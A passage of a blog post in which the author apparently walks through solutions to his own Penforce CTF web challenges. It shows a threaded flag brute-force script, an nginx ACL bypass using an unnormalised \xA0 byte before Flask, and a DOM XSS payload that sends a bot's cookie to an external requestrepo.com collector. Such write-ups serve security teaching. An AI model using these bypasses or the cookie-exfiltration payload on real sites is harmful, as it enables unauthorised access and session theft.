<span class="k">def</span> <span class="nf">has_admin</span><span class="p">(</span><span class="n">chars</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">r</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">cookies</span><span class="o">=</span><span class="n">cookies</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">chars</span><span class="sh">"</span><span class="p">:</span> <span class="n">chars</span><span class="p">},</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">5</span><span class="p">)</span>
        <span class="n">data</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span>
        <span class="k">return</span> <span class="nf">any</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">)</span> <span class="o">==</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">data</span><span class="p">)</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[!] Error with </span><span class="si">{</span><span class="n">chars</span><span class="si">}</span><span class="s">: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
        <span class="k">return</span> <span class="bp">False</span>

<span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">PCT</span><span class="sh">"</span>   <span class="c1"># starting prefix
</span><span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">[+] Start:</span><span class="sh">"</span><span class="p">,</span> <span class="n">flag</span><span class="p">)</span>

<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
    <span class="n">prefix</span> <span class="o">=</span> <span class="n">flag</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">:]</span>   <span class="c1"># last two known chars
</span>    <span class="n">found</span> <span class="o">=</span> <span class="bp">None</span>

    <span class="k">with</span> <span class="nc">ThreadPoolExecutor</span><span class="p">(</span><span class="n">max_workers</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span> <span class="k">as</span> <span class="n">executor</span><span class="p">:</span>  <span class="c1"># 10 threads
</span>        <span class="n">futures</span> <span class="o">=</span> <span class="p">{</span><span class="n">executor</span><span class="p">.</span><span class="nf">submit</span><span class="p">(</span><span class="n">has_admin</span><span class="p">,</span> <span class="n">prefix</span> <span class="o">+</span> <span class="n">c</span><span class="p">):</span> <span class="n">c</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">charset</span><span class="p">}</span>

        <span class="k">for</span> <span class="n">future</span> <span class="ow">in</span> <span class="nf">as_completed</span><span class="p">(</span><span class="n">futures</span><span class="p">):</span>
            <span class="n">c</span> <span class="o">=</span> <span class="n">futures</span><span class="p">[</span><span class="n">future</span><span class="p">]</span>
            <span class="k">if</span> <span class="n">future</span><span class="p">.</span><span class="nf">result</span><span class="p">():</span>
                <span class="n">found</span> <span class="o">=</span> <span class="n">c</span>
                <span class="k">break</span>   <span class="c1"># stop as soon as we find the right char
</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">found</span><span class="p">:</span>
        <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">[!] No more chars found, stopping.</span><span class="sh">"</span><span class="p">)</span>
        <span class="k">break</span>

    <span class="n">flag</span> <span class="o">+=</span> <span class="n">found</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[+] Next char: </span><span class="si">{</span><span class="n">found</span><span class="si">}</span><span class="s"> -&gt; </span><span class="si">{</span><span class="n">flag</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

    <span class="k">if</span> <span class="n">found</span> <span class="o">==</span> <span class="sh">"</span><span class="s">}</span><span class="sh">"</span><span class="p">:</span>
        <span class="nf">print</span><span class="p">(</span><span class="sh">"</span><span class="s">[*] Done! Flag =</span><span class="sh">"</span><span class="p">,</span> <span class="n">flag</span><span class="p">)</span>
        <span class="k">break</span>

</pre></td></tr></tbody></table></code></div></div>

<p><a href="/assets/images/penforce/Bru7eFeed-flag.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Bru7eFeed-flag.png" alt="Bru7eFeed" loading="lazy"></a></p>

<hr />

<h3 id="ela5der"><span class="me-2">Ela5der</span><a href="#ela5der" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p><a href="/assets/images/penforce/Ela5der.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Ela5der.png" alt="Ela5der" loading="lazy"></a></p>

<p>This was a fun and an intersting challenge to know, first let’s explore the challenge
<a href="/assets/images/penforce/Ela5der-home.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Ela5der-home.png" alt="" loading="lazy"></a></p>

<p>We start by landing at the home page, no much functionality just registration and login
<a href="/assets/images/penforce/Ela5der-login.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Ela5der-login.png" alt="" loading="lazy"></a></p>

<p>After loging we still land at the home page and there is nothing more to show so let’s see the source code and see what can be found.</p>

<p><a href="/assets/images/penforce/Ela5der-routes.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Ela5der-routes.png" alt="" loading="lazy"></a></p>

<p>So we check the source to see what the app is doing. In the routes listing we notice an /admin endpoint. It isn’t restricted to specific roles; any authenticated user can access it — which we already are.
but..
<a href="/assets/images/penforce/Ela5der-forbidden.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Ela5der-forbidden.png" alt="" loading="lazy"></a></p>

<p>the app runs behined nginx Hmm, Back to the source code we found a file called Ela5der.conf inside nginx directory</p>

<p><a href="/assets/images/penforce/Ela5der-nginx.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Ela5der-nginx.png" alt="" loading="lazy"></a></p>

<p>Nginx is forbidding any access to the /admin endpoint — seems very secure, isn’t it? Unfortunately, it’s not.</p>

<blockquote>
  <p>To prevent security issues on URI-based rules, Nginx performs path normalization before checking them. Path normalization in Nginx refers to the process of transforming and standardizing requested URLs to a consistent and canonical format before handling them. It involves removing redundant or unnecessary elements from the URL path, such as extra slashes, dot segments, processing path traversal, and URL-encoded characters, to ensure uniformity and proper routing within the web server.</p>
</blockquote>

<p>There has been research on how Nginx handles rules, specifically how it normalizes certain characters while others remain unaffected.
<a href="https://blog.bugport.net/exploiting-http-parsers-inconsistencies#heading-nginx-acl-rules">https://blog.bugport.net/exploiting-http-parsers-inconsistencies#heading-nginx-acl-rules</a></p>

<p>so by knowing that the application is runing a flask application we need to find a charachters that nginx doesn’t normalize but flask does</p>

<p>Nginx Version Flask Bypass Characters</p>

<div class="table-wrapper"><table>
  <thead>
    <tr>
      <th>Nginx Version</th>
      <th>Flask Bypass Characters</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>1.22.0</td>
      <td><code class="language-plaintext highlighter-rouge">\x85</code>, <code class="language-plaintext highlighter-rouge">\xA0</code></td>
    </tr>
    <tr>
      <td>1.21.6</td>
      <td><code class="language-plaintext highlighter-rouge">\x85</code>, <code class="language-plaintext highlighter-rouge">\xA0</code></td>
    </tr>
    <tr>
      <td>1.20.2</td>
      <td><code class="language-plaintext highlighter-rouge">\x85</code>, <code class="language-plaintext highlighter-rouge">\xA0</code>, <code class="language-plaintext highlighter-rouge">\x1F</code>, <code class="language-plaintext highlighter-rouge">\x1E</code>, <code class="language-plaintext highlighter-rouge">\x1D</code>, <code class="language-plaintext highlighter-rouge">\x1C</code>, <code class="language-plaintext highlighter-rouge">\x0C</code>, <code class="language-plaintext highlighter-rouge">\x0B</code></td>
    </tr>
    <tr>
      <td>1.18.0</td>
      <td><code class="language-plaintext highlighter-rouge">\x85</code>, <code class="language-plaintext highlighter-rouge">\xA0</code>, <code class="language-plaintext highlighter-rouge">\x1F</code>, <code class="language-plaintext highlighter-rouge">\x1E</code>, <code class="language-plaintext highlighter-rouge">\x1D</code>, <code class="language-plaintext highlighter-rouge">\x1C</code>, <code class="language-plaintext highlighter-rouge">\x0C</code>, <code class="language-plaintext highlighter-rouge">\x0B</code></td>
    </tr>
    <tr>
      <td>1.16.1</td>
      <td><code class="language-plaintext highlighter-rouge">\x85</code>, <code class="language-plaintext highlighter-rouge">\xA0</code>, <code class="language-plaintext highlighter-rouge">\x1F</code>, <code class="language-plaintext highlighter-rouge">\x1E</code>, <code class="language-plaintext highlighter-rouge">\x1D</code>, <code class="language-plaintext highlighter-rouge">\x1C</code>, <code class="language-plaintext highlighter-rouge">\x0C</code>, <code class="language-plaintext highlighter-rouge">\x0B</code></td>
    </tr>
  </tbody>
</table></div>

<p>the nginx that is runing on the backend is version 1.26.3 but guess what it’s still doesn’t normalize the \xA0
<a href="/assets/images/penforce/nginx.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/nginx.png" alt="" loading="lazy"></a></p>

<p>So we will try to send a request like this in burp</p>

<p><code class="language-plaintext highlighter-rouge">GET /admin\xA0  HTTP/1.1</code></p>

<p><a href="/assets/images/penforce/Ela5der-bypass.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Ela5der-bypass.png" alt="" loading="lazy"></a>
<a href="/assets/images/penforce/Ela5der-panel.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/Ela5der-panel.png" alt="" loading="lazy"></a></p>

<hr />

<h3 id="gimme-flag"><span class="me-2">Gimme FLag</span><a href="#gimme-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p><a href="/assets/images/penforce/GimmeFlag.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag.png" alt="" loading="lazy"></a></p>

<p>This is an interesting XSS challenge that leverages the javascript URI scheme with a restricted open-redirect URL.
<a href="/assets/images/penforce/GimmeFlag-Home.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-Home.png" alt="" loading="lazy"></a></p>

<p>let’s register an account and login
<a href="/assets/images/penforce/GimmeFlag-login.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-login.png" alt="" loading="lazy"></a></p>

<p>after we login we land on a dashboard page it doens’t really have something interesting
<a href="/assets/images/penforce/GimmeFlag-dashboard.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-dashboard.png" alt="" loading="lazy"></a>
let’s visit the profile and see what’s there
<a href="/assets/images/penforce/GimmeFlag-profile.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-profile.png" alt="" loading="lazy"></a>
the first thing that comes to your mind is stored xss but no it’s not :”)
we have provided the source code let’s see if there is something intresting
there is no much intresting about it other than the visit route that takes a url from us and sends it to the bot
<a href="/assets/images/penforce/GimmeFlag-visit.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-visit.png" alt="" loading="lazy"></a></p>

<p>the bot takes a url and open a headless browser and sets a cookie in this case is the flag
<a href="/assets/images/penforce/GimmeFlag-bot.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-bot.png" alt="" loading="lazy"></a></p>

<p>see we need to find a way to get the xss, Back to the user profile let’s inspect the page
<a href="/assets/images/penforce/GimmeFlag-script.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-script.png" alt="" loading="lazy"></a></p>

<p>we see that we can update the username using a param called <code class="language-plaintext highlighter-rouge">name</code> which will be updated using <code class="language-plaintext highlighter-rouge">document.getElementById('displayName').textContent</code> but is it vulnerable to xss ? hmm let’s see
<a href="/assets/images/penforce/GimmeFlag-xss1.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-xss1.png" alt="" loading="lazy"></a></p>

<p>Nope — it’s not that the script gets rendered. Back to the script: we found a parameter called url which is used to redirect users to any other domain. Hmm — thinking of leaving the javascript: scheme, isn’t it? But wait: it’s limited to 15 characters, so there is no way to find a payload under 15 characters that can steal the cookie.</p>

<p>Let’s play a little with what’s in this script using the browser console.
since there is no way to put more than 15 chars in the <code class="language-plaintext highlighter-rouge">url</code> param and there is already a javascript variables decalred in the <code class="language-plaintext highlighter-rouge">script</code> tag we can use them to hold the payload we want to execute and use that variable to trigger this payload the first thing that come to yourmind is <code class="language-plaintext highlighter-rouge">eval()</code> right let’s see in console</p>

<p><a href="/assets/images/penforce/GimmeFlag-xss2.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-xss2.png" alt="" loading="lazy"></a></p>

<p>ok let’s use eval this time but with <code class="language-plaintext highlighter-rouge">window.location.href</code> ofc it gave use 404 :”)</p>

<p>let’s try this time <code class="language-plaintext highlighter-rouge">javascript:</code> schema</p>

<p><a href="/assets/images/penforce/GimmeFlag-xss3.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-xss3.png" alt="" loading="lazy"></a></p>

<p>still nothing let’s try it this time with <code class="language-plaintext highlighter-rouge">window.location.href="javascript:str"</code> and viooola the payload got triggred.</p>

<p><a href="/assets/images/penforce/GimmeFlag-xss4.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-xss4.png" alt="" loading="lazy"></a></p>

<p>let’s try to get our own cookie</p>

<p><a href="/assets/images/penforce/GimmeFlag-xss5.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-xss5.png" alt="" loading="lazy"></a>
nice we now got the Dom xss let’s get the bot cookie which conatins the flag by sending <code class="language-plaintext highlighter-rouge">http://192.168.1.9:5000/profile/ea7fc763-38d1-4c5d-bd6d-f518602c3e10?name=&lt;script&gt;fetch('https://30xbwg5j.requestrepo.com/'%2bdocument.cookie)&lt;/script&gt;&amp;url=javascript:name</code></p>

<p><a href="/assets/images/penforce/GimmeFlag-xss6.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-xss6.png" alt="" loading="lazy"></a></p>

<p>and a few seconds later we have our flag :”</p>

<p><a href="/assets/images/penforce/GimmeFlag-final.png" class="popup img-link  shimmer"><img src="/assets/images/penforce/GimmeFlag-final.png" alt="" loading="lazy"></a></p>

<p>and that’s it i hope u enjoyed my lovely challenges can’t wait to create more.</p>
</div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
    <div class="post-meta mb-3">
      <i class="far fa-folder-open fa-fw me-1"></i>
      
      <a
        href="/categories/ctf/"
        >CTF</a
      >
    </div>
    

    <!-- tags -->
    
    <div class="post-tags">
      <i class="fa fa-tags fa-fw me-1"></i>
      
      <a
        href="/tags/web/"
        class="post-tag no-text-decoration"
      >Web</a>
      
      <a
        href="/tags/penforce/"
        class="post-tag no-text-decoration"
      >Penforce</a>
      
    </div>
    

    <div
      class="post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2"
    >
      <div class="license-wrapper">
          This post is licensed under this 
        <a href="https://mohamedaboelnasr.github.io">
          blog
        </a>
         by the author. 
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Penforce%20CTF%20-%20Hell%E2%80%99s%20Executioner&url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FPenforce%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Penforce%20CTF%20-%20Hell%E2%80%99s%20Executioner&u=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FPenforce%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=http%3A%2F%2Flocalhost%3A4000%2Fposts%2FPenforce%2F&text=Penforce%20CTF%20-%20Hell%E2%80%99s%20Executioner" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Penforce/">Penforce CTF</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Blind-Trust/">Blind Trust</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Reset-Writeup/">Reset Writeup</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Abusing-OG-Protocol-With-Macros/">Abusing OG Protocol With Macros</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Hiding-Your-Shell-code-inside-PE-File-Format/">Hiding Your Shell code inside PE File Format</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ad/">AD</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">Web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/asc25/">ASC25</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/maldev/">maldev</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/penforce/">Penforce</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/phishing/">phishing</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/wininternals/">wininternals</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  
    










  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/Blind-Trust/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1754265600"
  data-df="ll"
  
>
  Aug  4, 2025
</time>

              <h4 class="pt-0 my-2">Blind Trust</h4>
              <div class="text-muted">
                <p>Blind Trust  Hello everyone, It’s been a while since I published a write-up. In this one, I’m going to show you how I managed to solve a web challenge that had zero solves during Arab War Games CTF...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/Blind-Trust/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>Blind Trust</p>
    </a>
  

  
    <div class="btn btn-outline-primary disabled" aria-label="Newer">
      <p>-</p>
    </div>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://twitter.com/Abo_Elnasr101">Aboelnasr</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
      
        
        

  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/ad/">AD</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/web/">Web</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/asc25/">ASC25</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/maldev/">maldev</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/penforce/">Penforce</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/phishing/">phishing</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/wininternals/">wininternals</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

